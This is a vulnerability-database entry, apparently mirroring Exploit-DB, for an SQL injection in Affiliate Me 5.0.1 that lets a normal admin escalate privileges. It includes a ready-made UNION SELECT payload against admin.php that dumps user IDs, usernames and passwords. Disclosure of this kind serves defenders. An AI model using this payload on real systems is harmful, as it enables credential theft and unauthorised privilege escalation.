Affiliate Me Version 5.0.1 - SQL Injection

vendor:

Affiliate Me

by:

Faisal Albuloushi

6.4

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Affiliate Me

Affected Version From: 5.0.1

Affected Version To: 5.0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2023

Affiliate Me Version 5.0.1 – SQL Injection

The vulnerability allows a normal admin to escalate their privileges to super admin by exploiting a SQL injection vulnerability in Affiliate Me version 5.0.1. The vulnerability can be exploited by sending a specially crafted request to the admin.php file with an injected query.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the vendor-provided patch or update to a version that is not affected.

Source

Exploit-DB raw data:

[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] Exploit:

[path]/admin.php?show=reply&id=[Injected Query]


[#] 3xample:

[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -


[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.